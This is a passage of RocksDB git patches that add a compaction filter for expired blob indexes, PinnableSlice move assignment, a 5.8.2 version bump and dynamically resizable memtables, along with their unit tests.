the user has specified a compaction filter and the sequence @@ -240,11 +241,13 @@ void CompactionIterator::NextFromInput() { CompactionFilter::Decision filter; compaction_filter_value_.clear(); compaction_filter_skip_until_.Clear(); + CompactionFilter::ValueType value_type = + ikey_.type == kTypeValue ? CompactionFilter::ValueType::kValue + : CompactionFilter::ValueType::kBlobIndex; { StopWatchNano timer(env_, true); filter = compaction_filter_->FilterV2( - compaction_->level(), ikey_.user_key, - CompactionFilter::ValueType::kValue, value_, + compaction_->level(), ikey_.user_key, value_type, value_, &compaction_filter_value_, compaction_filter_skip_until_.rep()); iter_stats_.total_filter_time += env_ != nullptr ? timer.ElapsedNanos() : 0; diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 9a8c0318c5d..64f61a35e0c 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -36,6 +36,7 @@ class CompactionFilter { enum ValueType { kValue, kMergeOperand, + kBlobIndex, // used internally by BlobDB. }; enum class Decision { @@ -171,6 +172,8 @@ class CompactionFilter { bool rv = FilterMergeOperand(level, key, existing_value); return rv ? Decision::kRemove : Decision::kKeep; } + case ValueType::kBlobIndex: + return Decision::kKeep; } assert(false); return Decision::kKeep; diff --git a/utilities/blob_db/blob_compaction_filter.h b/utilities/blob_db/blob_compaction_filter.h new file mode 100644 index 00000000000..26cd188fe9c --- /dev/null +++ b/utilities/blob_db/blob_compaction_filter.h @@ -0,0 +1,78 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once +#ifndef ROCKSDB_LITE + +#include "rocksdb/compaction_filter.h" +#include "rocksdb/env.h" +#include "utilities/blob_db/blob_index.h" + +namespace rocksdb { +namespace blob_db { + +// CompactionFilter to delete expired blob index from base DB. +class BlobIndexCompactionFilter : public CompactionFilter { + public: + explicit BlobIndexCompactionFilter(uint64_t current_time) + : current_time_(current_time) {} + + virtual const char* Name() const override { + return "BlobIndexCompactionFilter"; + } + + // Filter expired blob indexes regardless of snapshots. + virtual bool IgnoreSnapshots() const override { return true; } + + virtual Decision FilterV2(int /*level*/, const Slice& /*key*/, + ValueType value_type, const Slice& value, + std::string* /*new_value*/, + std::string* /*skip_until*/) const override { + if (value_type != kBlobIndex) { + return Decision::kKeep; + } + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(value); + if (!s.ok()) { + // Unable to decode blob index. Keeping the value. + return Decision::kKeep; + } + if (blob_index.HasTTL() && blob_index.expiration() <= current_time_) { + // Expired + return Decision::kRemove; + } + return Decision::kKeep; + } + + private: + const uint64_t current_time_; +}; + +class BlobIndexCompactionFilterFactory : public CompactionFilterFactory { + public: + explicit BlobIndexCompactionFilterFactory(Env* env) : env_(env) {} + + virtual const char* Name() const override { + return "BlobIndexCompactionFilterFactory"; + } + + virtual std::unique_ptr CreateCompactionFilter( + const CompactionFilter::Context& /*context*/) override { + int64_t current_time = 0; + Status s = env_->GetCurrentTime(¤t_time); + if (!s.ok()) { + return nullptr; + } + assert(current_time >= 0); + return std::unique_ptr( + new BlobIndexCompactionFilter(static_cast(current_time))); + } + + private: + Env* env_; +}; + +} // namespace blob_db +} // namespace rocksdb +#endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index f763ced20cf..b278df77f3f 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -26,6 +26,7 @@ #include "table/block_builder.h" #include "util/file_reader_writer.h" #include "util/filename.h" +#include "utilities/blob_db/blob_compaction_filter.h" #include "utilities/blob_db/blob_db_impl.h" namespace rocksdb { @@ -45,6 +46,11 @@ Status BlobDB::OpenAndLoad(const Options& options, const BlobDBOptions& bdb_options, const std::string& dbname, BlobDB** blob_db, Options* changed_options) { + if (options.compaction_filter != nullptr || + options.compaction_filter_factory != nullptr) { + return Status::NotSupported("Blob DB doesn't support compaction filter."); + } + *changed_options = options; *blob_db = nullptr; @@ -63,6 +69,8 @@ Status BlobDB::OpenAndLoad(const Options& options, all_wal_filters.push_back(rw_filter); } + changed_options->compaction_filter_factory.reset( + new BlobIndexCompactionFilterFactory(options.env)); changed_options->listeners.emplace_back(fblistener); if (bdb_options.enable_garbage_collection) { changed_options->listeners.emplace_back(ce_listener); @@ -112,6 +120,11 @@ Status BlobDB::Open(const DBOptions& db_options_input, const std::vector& column_families, std::vector* handles, BlobDB** blob_db, bool no_base_db) { + if (column_families.size() != 1 || + column_families[0].name != kDefaultColumnFamilyName) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } *blob_db = nullptr; Status s; @@ -144,6 +157,15 @@ Status BlobDB::Open(const DBOptions& db_options_input, all_wal_filters.push_back(rw_filter); } + ColumnFamilyOptions cf_options(column_families[0].options); + if (cf_options.compaction_filter != nullptr || + cf_options.compaction_filter_factory != nullptr) { + return Status::NotSupported("Blob DB doesn't support compaction filter."); + } + cf_options.compaction_filter_factory.reset( + new BlobIndexCompactionFilterFactory(db_options.env)); + ColumnFamilyDescriptor cf_descriptor(kDefaultColumnFamilyName, cf_options); + // we need to open blob db first so that recovery can happen BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); @@ -164,7 +186,7 @@ Status BlobDB::Open(const DBOptions& db_options_input, } DB* db = nullptr; - s = DB::Open(db_options, dbname, column_families, handles, &db); + s = DB::Open(db_options, dbname, {cf_descriptor}, handles, &db); if (!s.ok()) { delete bdb; return s; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 74676d4fa7b..6edafe1790e 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1727,6 +1727,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, GarbageCollectionWriteCallback callback(cfd, record.key, latest_seq); // If key has expired, remove it from base DB. + // TODO(yiwu): Blob indexes will be remove by BlobIndexCompactionFilter. + // We can just drop the blob record. if (no_relocation_ttl || (has_ttl && now >= record.expiration)) { gc_stats->num_deletes++; gc_stats->deleted_size += record.value_size; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 1c949356541..b036c0208fc 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -47,10 +47,15 @@ class BlobDBTest : public testing::Test { ~BlobDBTest() { Destroy(); } + Status TryOpen(BlobDBOptions bdb_options = BlobDBOptions(), + Options options = Options()) { + options.create_if_missing = true; + return BlobDB::Open(options, bdb_options, dbname_, &blob_db_); + } + void Open(BlobDBOptions bdb_options = BlobDBOptions(), Options options = Options()) { - options.create_if_missing = true; - ASSERT_OK(BlobDB::Open(options, bdb_options, dbname_, &blob_db_)); + ASSERT_OK(TryOpen(bdb_options, options)); } void Destroy() { @@ -79,6 +84,10 @@ class BlobDBTest : public testing::Test { } } + Status PutUntil(const Slice &key, const Slice &value, uint64_t expiration) { + return blob_db_->PutUntil(WriteOptions(), key, value, expiration); + } + void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; @@ -1122,6 +1131,95 @@ TEST_F(BlobDBTest, InlineSmallValues) { ASSERT_EQ(last_ttl_seq, ttl_file->GetSequenceRange().second); } +TEST_F(BlobDBTest, CompactionFilterNotSupported) { + class TestCompactionFilter : public CompactionFilter { + virtual const char *Name() const { return "TestCompactionFilter"; } + }; + class TestCompactionFilterFactory : public CompactionFilterFactory { + virtual const char *Name() const { return "TestCompactionFilterFactory"; } + virtual std::unique_ptr CreateCompactionFilter( + const CompactionFilter::Context & /*context*/) { + return std::unique_ptr(new TestCompactionFilter()); + } + }; + for (int i = 0; i < 2; i++) { + Options options; + if (i == 0) { + options.compaction_filter = new TestCompactionFilter(); + } else { + options.compaction_filter_factory.reset( + new TestCompactionFilterFactory()); + } + ASSERT_TRUE(TryOpen(BlobDBOptions(), options).IsNotSupported()); + delete options.compaction_filter; + } +} + +TEST_F(BlobDBTest, FilterExpiredBlobIndex) { + constexpr size_t kNumKeys = 100; + constexpr size_t kNumPuts = 1000; + constexpr uint64_t kMaxExpiration = 1000; + constexpr uint64_t kCompactTime = 500; + constexpr uint64_t kMinBlobSize = 100; + Random rnd(301); + mock_env_->set_current_time(0); + BlobDBOptions bdb_options; + bdb_options.min_blob_size = kMinBlobSize; + bdb_options.disable_background_tasks = true; + Options options; + options.env = mock_env_.get(); + Open(bdb_options, options); + + std::map data; + std::map data_after_compact; + for (size_t i = 0; i < kNumPuts; i++) { + bool is_small_value = rnd.Next() % 2; + bool has_ttl = rnd.Next() % 2; + uint64_t expiration = rnd.Next() % kMaxExpiration; + int len = is_small_value ? 10 : 200; + std::string key = "key" + ToString(rnd.Next() % kNumKeys); + std::string value = test::RandomHumanReadableString(&rnd, len); + if (!has_ttl) { + if (is_small_value) { + std::string blob_entry; + BlobIndex::EncodeInlinedTTL(&blob_entry, expiration, value); + // Fake blob index with TTL. See what it will do. + ASSERT_GT(kMinBlobSize, blob_entry.size()); + value = blob_entry; + } + ASSERT_OK(Put(key, value)); + data_after_compact[key] = value; + } else { + ASSERT_OK(PutUntil(key, value, expiration)); + if (expiration <= kCompactTime) { + data_after_compact.erase(key); + } else { + data_after_compact[key] = value; + } + } + data[key] = value; + } + VerifyDB(data); + + mock_env_->set_current_time(kCompactTime); + // Take a snapshot before compaction. Make sure expired blob indexes is + // filtered regardless of snapshot. + const Snapshot *snapshot = blob_db_->GetSnapshot(); + // Issue manual compaction to trigger compaction filter. + ASSERT_OK(blob_db_->CompactRange(CompactRangeOptions(), + blob_db_->DefaultColumnFamily(), nullptr, + nullptr)); + blob_db_->ReleaseSnapshot(snapshot); + // Verify expired blob index are filtered. + std::vector versions; + GetAllKeyVersions(blob_db_, "", "", &versions); + ASSERT_EQ(data_after_compact.size(), versions.size()); + for (auto &version : versions) { + ASSERT_TRUE(data_after_compact.count(version.user_key) > 0); + } + VerifyDB(data_after_compact); +} + } // namespace blob_db } // namespace rocksdb From 17f67b5462de15693494e7e08537db652ea45b04 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 12 Oct 2017 18:19:10 -0700 Subject: [PATCH 187/205] PinnableSlice move assignment Summary: Allow `std::move(pinnable_slice)`. Closes https://github.com/facebook/rocksdb/pull/2997 Differential Revision: D6036782 Pulled By: yiwu-arbug fbshipit-source-id: 583fb0419a97e437ff530f4305822341cd3381fa --- CMakeLists.txt | 2 ++ Makefile | 4 +++ TARGETS | 1 + include/rocksdb/cleanable.h | 9 +++++ include/rocksdb/slice.h | 25 +++++++++++++ src.mk | 2 ++ table/iterator.cc | 13 +++++++ util/slice_test.cc | 70 +++++++++++++++++++++++++++++++++++++ 8 files changed, 126 insertions(+) create mode 100644 util/slice_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index ab2177b886e..18effaa0667 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -779,6 +779,7 @@ if(WITH_TESTS) options/options_test.cc table/block_based_filter_block_test.cc table/block_test.cc + table/cleanable_test.cc table/cuckoo_table_builder_test.cc table/cuckoo_table_reader_test.cc table/full_filter_block_test.cc @@ -801,6 +802,7 @@ if(WITH_TESTS) util/hash_test.cc util/heap_test.cc util/rate_limiter_test.cc + util/slice_test.cc util/slice_transform_test.cc util/timer_queue_test.cc util/thread_list_test.cc diff --git a/Makefile b/Makefile index 5a89f6bf79d..c5ba1012444 100644 --- a/Makefile +++ b/Makefile @@ -477,6 +477,7 @@ TESTS = \ object_registry_test \ repair_test \ env_timed_test \ + slice_test \ PARALLEL_TEST = \ backupable_db_test \ @@ -1435,6 +1436,9 @@ range_del_aggregator_test: db/range_del_aggregator_test.o db/db_test_util.o $(LI blob_db_test: utilities/blob_db/blob_db_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) +slice_test: util/slice_test.o $(LIBOBJECTS) $(TESTHARNESS) + $(AM_LINK) + #------------------------------------------------- # make install related stuff INSTALL_PATH ?= /usr/local diff --git a/TARGETS b/TARGETS index ac85eab93c7..c9631b25ae1 100644 --- a/TARGETS +++ b/TARGETS @@ -463,6 +463,7 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['repair_test', 'db/repair_test.cc', 'serial'], ['sim_cache_test', 'utilities/simulator_cache/sim_cache_test.cc', 'serial'], ['skiplist_test', 'memtable/skiplist_test.cc', 'serial'], + ['slice_test', 'util/slice_test.cc', 'serial'], ['slice_transform_test', 'util/slice_transform_test.cc', 'serial'], ['spatial_db_test', 'utilities/spatialdb/spatial_db_test.cc', 'serial'], ['sst_dump_test', 'tools/sst_dump_test.cc', 'serial'], diff --git a/include/rocksdb/cleanable.h b/include/rocksdb/cleanable.h index 0f45c7108ad..cd2e9425f12 100644 --- a/include/rocksdb/cleanable.h +++ b/include/rocksdb/cleanable.h @@ -25,6 +25,15 @@ class Cleanable { public: Cleanable(); ~Cleanable(); + + // No copy constructor and copy assignment allowed. + Cleanable(Cleanable&) = delete; + Cleanable& operator=(Cleanable&) = delete; + + // Move consturctor and move assignment is allowed. + Cleanable(Cleanable&&); + Cleanable& operator=(Cleanable&&); + // Clients are allowed to register function/arg1/arg2 triples that // will be invoked when this iterator is destroyed. // diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index 1630803b9fd..924f1faef72 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -129,6 +129,31 @@ class PinnableSlice : public Slice, public Cleanable { PinnableSlice() { buf_ = &self_space_; } explicit PinnableSlice(std::string* buf) { buf_ = buf; } + // No copy constructor and copy assignment allowed. + PinnableSlice(PinnableSlice&) = delete; + PinnableSlice& operator=(PinnableSlice&) = delete; + + PinnableSlice(PinnableSlice&& other) { *this = std::move(other); } + + PinnableSlice& operator=(PinnableSlice&& other) { + if (this != &other) { + // cleanup itself. + Reset(); + + Slice::operator=(other); + Cleanable::operator=(std::move(other)); + pinned_ = other.pinned_; + if (!pinned_ && other.buf_ == &other.self_space_) { + self_space_ = std::move(other.self_space_); + buf_ = &self_space_; + data_ = buf_->data(); + } else { + buf_ = other.buf_; + } + } + return *this; + } + inline void PinSlice(const Slice& s, CleanupFunction f, void* arg1, void* arg2) { assert(!pinned_); diff --git a/src.mk b/src.mk index 30012d11f56..bb08721df95 100644 --- a/src.mk +++ b/src.mk @@ -301,6 +301,7 @@ MAIN_SOURCES = \ options/options_test.cc \ table/block_based_filter_block_test.cc \ table/block_test.cc \ + table/cleanable_test.cc \ table/cuckoo_table_builder_test.cc \ table/cuckoo_table_reader_test.cc \ table/full_filter_block_test.cc \ @@ -325,6 +326,7 @@ MAIN_SOURCES = \ util/filelock_test.cc \ util/log_write_bench.cc \ util/rate_limiter_test.cc \ + util/slice_test.cc \ util/slice_transform_test.cc \ util/timer_queue_test.cc \ util/thread_list_test.cc \ diff --git a/table/iterator.cc b/table/iterator.cc index 23a84b59e0f..ed6a2cdea44 100644 --- a/table/iterator.cc +++ b/table/iterator.cc @@ -21,6 +21,19 @@ Cleanable::Cleanable() { Cleanable::~Cleanable() { DoCleanup(); } +Cleanable::Cleanable(Cleanable&& other) { + *this = std::move(other); +} + +Cleanable& Cleanable::operator=(Cleanable&& other) { + if (this != &other) { + cleanup_ = other.cleanup_; + other.cleanup_.function = nullptr; + other.cleanup_.next = nullptr; + } + return *this; +} + // If the entire linked list was on heap we could have simply add attach one // link list to another. However the head is an embeded object to avoid the cost // of creating objects for most of the use cases when the Cleanable has only one diff --git a/util/slice_test.cc b/util/slice_test.cc new file mode 100644 index 00000000000..308e1c312ff --- /dev/null +++ b/util/slice_test.cc @@ -0,0 +1,70 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#include "port/stack_trace.h" +#include "rocksdb/slice.h" +#include "util/testharness.h" + +namespace rocksdb { + +class SliceTest : public testing::Test {}; + +namespace { +void BumpCounter(void* arg1, void* arg2) { + (*reinterpret_cast(arg1))++; +} +} // anonymous namespace + +TEST_F(SliceTest, PinnableSliceMoveConstruct) { + for (int i = 0; i < 3; i++) { + int orig_cleanup = 0; + int moved_cleanup = 0; + PinnableSlice* s1 = nullptr; + std::string external_storage; + switch (i) { + case 0: + s1 = new PinnableSlice(); + *(s1->GetSelf()) = "foo"; + s1->PinSelf(); + s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); + break; + case 1: + s1 = new PinnableSlice(&external_storage); + *(s1->GetSelf()) = "foo"; + s1->PinSelf(); + s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); + break; + case 2: + s1 = new PinnableSlice(); + s1->PinSlice("foo", BumpCounter, &moved_cleanup, nullptr); + break; + } + ASSERT_EQ("foo", s1->ToString()); + PinnableSlice* s2 = new PinnableSlice(); + s2->PinSelf("bar"); + ASSERT_EQ("bar", s2->ToString()); + s2->RegisterCleanup(BumpCounter, &orig_cleanup, nullptr); + *s2 = std::move(*s1); + ASSERT_EQ("foo", s2->ToString()); + ASSERT_EQ(1, orig_cleanup); + ASSERT_EQ(0, moved_cleanup); + delete s1; + // ASAN will check if it will access storage of s1, which is deleted. + ASSERT_EQ("foo", s2->ToString()); + ASSERT_EQ(1, orig_cleanup); + ASSERT_EQ(0, moved_cleanup); + delete s2; + ASSERT_EQ(1, orig_cleanup); + ASSERT_EQ(1, moved_cleanup); + } +} + +} // namespace rocksdb + +int main(int argc, char** argv) { + rocksdb::port::InstallStackTraceHandler(); + ::testing::InitGoogleTest(&argc, argv); + return RUN_ALL_TESTS(); +} From 2584a18efb2a15955084142b2d07b9ed992ec57d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 3 Nov 2017 10:22:50 -0700 Subject: [PATCH 188/205] Blob DB: Fix BlobDBTest::SnapshotAndGarbageCollection asan failure Summary: Fix unreleased snapshot at the end of the test. Closes https://github.com/facebook/rocksdb/pull/3126 Differential Revision: D6232867 Pulled By: yiwu-arbug fbshipit-source-id: 651ca3144fc573ea2ab0ab20f0a752fb4a101d26 --- utilities/blob_db/blob_db_test.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index b036c0208fc..708cec5c780 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -883,6 +883,7 @@ TEST_F(BlobDBTest, SnapshotAndGarbageCollection) { if (i == 0 || i == 3 || (i == 2 && delete_key)) { // The snapshot shouldn't see data in bfile ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size()); + blob_db_->ReleaseSnapshot(snapshot); } else { // The snapshot will see data in bfile, so the file shouldn't be deleted ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size()); From 7f1815c379e5493a08624f75d44ce2a1914d64af Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 3 Nov 2017 12:25:30 -0700 Subject: [PATCH 189/205] Bump version to 5.8.2 --- HISTORY.md | 3 +++ include/rocksdb/version.h | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index e62622e081c..f8f74ca0373 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,7 @@ # Rocksdb Change Log +## 5.8.2 (11/03/2017) +No major changes. + ## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index 02234a2e2f3..e791dcca6e7 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 1 +#define ROCKSDB_PATCH 2 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 9019e912549caffe77994b9dd3e55bfe0095f508 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 2 Nov 2017 22:16:23 -0700 Subject: [PATCH 190/205] dynamically change current memtable size Summary: Previously setting `write_buffer_size` with `SetOptions` would only apply to new memtables. An internal user wanted it to take effect immediately, instead of at an arbitrary future point, to prevent OOM. This PR makes the memtable's size mutable, and makes `SetOptions()` mutate it. There is one case when we preserve the old behavior, which is when memtable prefix bloom filter is enabled and the user is increasing the memtable's capacity. That's because the prefix bloom filter's size is fixed and wouldn't work as well on a larger memtable. Closes https://github.com/facebook/rocksdb/pull/3119 Differential Revision: D6228304 Pulled By: ajkr fbshipit-source-id: e44bd9d10a5f8c9d8c464bf7436070bb3eafdfc9 --- db/column_family.cc | 7 +++++++ db/db_test.cc | 22 +++++++++++++++++----- db/memtable.cc | 25 +++++++++++++------------ db/memtable.h | 29 ++++++++++++++++++++++------- db/write_batch.cc | 4 ++-- 5 files changed, 61 insertions(+), 26 deletions(-) diff --git a/db/column_family.cc b/db/column_family.cc index b00eda0747d..6fd07878470 100644 --- a/db/column_family.cc +++ b/db/column_family.cc @@ -930,6 +930,13 @@ SuperVersion* ColumnFamilyData::InstallSuperVersion( super_version_ = new_superversion; ++super_version_number_; super_version_->version_number = super_version_number_; + if (old_superversion != nullptr) { + if (old_superversion->mutable_cf_options.write_buffer_size != + mutable_cf_options.write_buffer_size) { + mem_->UpdateWriteBufferSize(mutable_cf_options.write_buffer_size); + } + } + // Reset SuperVersions cached in thread local storage ResetThreadLocalSuperVersions(); diff --git a/db/db_test.cc b/db/db_test.cc index fddb7aea6d0..193101d460d 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -3347,11 +3347,23 @@ TEST_F(DBTest, DynamicMemtableOptions) { {"write_buffer_size", "131072"}, })); - // The existing memtable is still 64KB in size, after it becomes immutable, - // the next memtable will be 128KB in size. Write 256KB total, we should - // have a 64KB L0 file, a 128KB L0 file, and a memtable with 64KB data - gen_l0_kb(256); - ASSERT_EQ(NumTableFilesAtLevel(0), 2); // (A) + // The existing memtable inflated 64KB->128KB when we invoked SetOptions(). + // Write 192KB, we should have a 128KB L0 file and a memtable with 64KB data. + gen_l0_kb(192); + ASSERT_EQ(NumTableFilesAtLevel(0), 1); // (A) + ASSERT_LT(SizeAtLevel(0), k128KB + 2 * k5KB); + ASSERT_GT(SizeAtLevel(0), k128KB - 4 * k5KB); + + // Decrease buffer size below current usage + ASSERT_OK(dbfull()->SetOptions({ + {"write_buffer_size", "65536"}, + })); + // The existing memtable became eligible for flush when we reduced its + // capacity to 64KB. Two keys need to be added to trigger flush: first causes + // memtable to be marked full, second schedules the flush. Then we should have + // a 128KB L0 file, a 64KB L0 file, and a memtable with just one key. + gen_l0_kb(2); + ASSERT_EQ(NumTableFilesAtLevel(0), 2); ASSERT_LT(SizeAtLevel(0), k128KB + k64KB + 2 * k5KB); ASSERT_GT(SizeAtLevel(0), k128KB + k64KB - 4 * k5KB); diff --git a/db/memtable.cc b/db/memtable.cc index 22b4125e075..d51b2618734 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -38,10 +38,10 @@ namespace rocksdb { -MemTableOptions::MemTableOptions(const ImmutableCFOptions& ioptions, - const MutableCFOptions& mutable_cf_options) - : write_buffer_size(mutable_cf_options.write_buffer_size), - arena_block_size(mutable_cf_options.arena_block_size), +ImmutableMemTableOptions::ImmutableMemTableOptions( + const ImmutableCFOptions& ioptions, + const MutableCFOptions& mutable_cf_options) + : arena_block_size(mutable_cf_options.arena_block_size), memtable_prefix_bloom_bits( static_cast( static_cast(mutable_cf_options.write_buffer_size) * @@ -82,6 +82,7 @@ MemTable::MemTable(const InternalKeyComparator& cmp, data_size_(0), num_entries_(0), num_deletes_(0), + write_buffer_size_(mutable_cf_options.write_buffer_size), flush_in_progress_(false), flush_completed_(false), file_number_(0), @@ -135,6 +136,7 @@ size_t MemTable::ApproximateMemoryUsage() { } bool MemTable::ShouldFlushNow() const { + size_t write_buffer_size = write_buffer_size_.load(std::memory_order_relaxed); // In a lot of times, we cannot allocate arena blocks that exactly matches the // buffer size. Thus we have to decide if we should over-allocate or // under-allocate. @@ -152,16 +154,14 @@ bool MemTable::ShouldFlushNow() const { // if we can still allocate one more block without exceeding the // over-allocation ratio, then we should not flush. if (allocated_memory + kArenaBlockSize < - moptions_.write_buffer_size + - kArenaBlockSize * kAllowOverAllocationRatio) { + write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) { return false; } - // if user keeps adding entries that exceeds moptions.write_buffer_size, - // we need to flush earlier even though we still have much available - // memory left. - if (allocated_memory > moptions_.write_buffer_size + - kArenaBlockSize * kAllowOverAllocationRatio) { + // if user keeps adding entries that exceeds write_buffer_size, we need to + // flush earlier even though we still have much available memory left. + if (allocated_memory > + write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) { return true; } @@ -264,7 +264,8 @@ class MemTableIterator : public InternalIterator { comparator_(mem.comparator_), valid_(false), arena_mode_(arena != nullptr), - value_pinned_(!mem.GetMemTableOptions()->inplace_update_support) { + value_pinned_( + !mem.GetImmutableMemTableOptions()->inplace_update_support) { if (use_range_del_table) { iter_ = mem.range_del_table_->GetIterator(arena); } else if (prefix_extractor_ != nullptr && !read_options.total_order_seek) { diff --git a/db/memtable.h b/db/memtable.h index 89679248425..4f63818eee8 100644 --- a/db/memtable.h +++ b/db/memtable.h @@ -35,11 +35,9 @@ class MemTableIterator; class MergeContext; class InternalIterator; -struct MemTableOptions { - explicit MemTableOptions( - const ImmutableCFOptions& ioptions, - const MutableCFOptions& mutable_cf_options); - size_t write_buffer_size; +struct ImmutableMemTableOptions { + explicit ImmutableMemTableOptions(const ImmutableCFOptions& ioptions, + const MutableCFOptions& mutable_cf_options); size_t arena_block_size; uint32_t memtable_prefix_bloom_bits; size_t memtable_huge_page_size; @@ -260,6 +258,18 @@ class MemTable { return num_deletes_.load(std::memory_order_relaxed); } + // Dynamically change the memtable's capacity. If set below the current usage, + // the next key added will trigger a flush. Can only increase size when + // memtable prefix bloom is disabled, since we can't easily allocate more + // space. + void UpdateWriteBufferSize(size_t new_write_buffer_size) { + if (prefix_bloom_ == nullptr || + new_write_buffer_size < write_buffer_size_) { + write_buffer_size_.store(new_write_buffer_size, + std::memory_order_relaxed); + } + } + // Returns the edits area that is needed for flushing the memtable VersionEdit* GetEdits() { return &edit_; } @@ -348,7 +358,9 @@ class MemTable { return comparator_.comparator; } - const MemTableOptions* GetMemTableOptions() const { return &moptions_; } + const ImmutableMemTableOptions* GetImmutableMemTableOptions() const { + return &moptions_; + } uint64_t ApproximateOldestKeyTime() const { return oldest_key_time_.load(std::memory_order_relaxed); @@ -362,7 +374,7 @@ class MemTable { friend class MemTableList; KeyComparator comparator_; - const MemTableOptions moptions_; + const ImmutableMemTableOptions moptions_; int refs_; const size_t kArenaBlockSize; AllocTracker mem_tracker_; @@ -376,6 +388,9 @@ class MemTable { std::atomic num_entries_; std::atomic num_deletes_; + // Dynamically changeable memtable option + std::atomic write_buffer_size_; + // These are used to manage memtable flushes to storage bool flush_in_progress_; // started the flush bool flush_completed_; // finished the flush diff --git a/db/write_batch.cc b/db/write_batch.cc index 89ae044c8b2..76fc94844a7 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -992,7 +992,7 @@ class MemTableInserter : public WriteBatch::Handler { } MemTable* mem = cf_mems_->GetMemTable(); - auto* moptions = mem->GetMemTableOptions(); + auto* moptions = mem->GetImmutableMemTableOptions(); if (!moptions->inplace_update_support) { mem->Add(sequence_, value_type, key, value, concurrent_memtable_writes_, get_post_process_info(mem)); @@ -1139,7 +1139,7 @@ class MemTableInserter : public WriteBatch::Handler { } MemTable* mem = cf_mems_->GetMemTable(); - auto* moptions = mem->GetMemTableOptions(); + auto* moptions = mem->GetImmutableMemTableOptions(); bool perform_merge = false; // If we pass DB through and options.max_successive_merges is hit From 5dc70a15caa8d6834498a3b6bfcd0f50eeaea524 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 3 Nov 2017 18:10:36 -0700 Subject: [PATCH 191/205] Fix PinnableSlice move assignment Summary: After move assignment, we need to re-initialized the moved PinnableSlice. Also update blob_db_impl.cc to not reuse the moved PinnableSlice since it is supposed to be in an undefined state after move. Closes https://github.com/facebook/rocksdb/pull/3127 Differential Revision: D6238585 Pulled By: yiwu-arbug fbshipit-source-id: bd99f2e37406c4f7de160c7dee6a2e8126bc224e --- include/rocksdb/slice.h | 4 ++++ util/slice_test.cc | 1 + utilities/blob_db/blob_db_impl.cc | 10 ++++++---- 3 files changed, 11 insertions(+), 4 deletions(-) diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index 924f1faef72..38e7efb6565 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -150,6 +150,10 @@ class PinnableSlice : public Slice, public Cleanable { } else { buf_ = other.buf_; } + // Re-initialize the other PinnablaeSlice. + other.self_space_.clear(); + other.buf_ = &other.self_space_; + other.pinned_ = false; } return *this; } diff --git a/util/slice_test.cc b/util/slice_test.cc index 308e1c312ff..33903ec72b9 100644 --- a/util/slice_test.cc +++ b/util/slice_test.cc @@ -47,6 +47,7 @@ TEST_F(SliceTest, PinnableSliceMoveConstruct) { ASSERT_EQ("bar", s2->ToString()); s2->RegisterCleanup(BumpCounter, &orig_cleanup, nullptr); *s2 = std::move(*s1); + 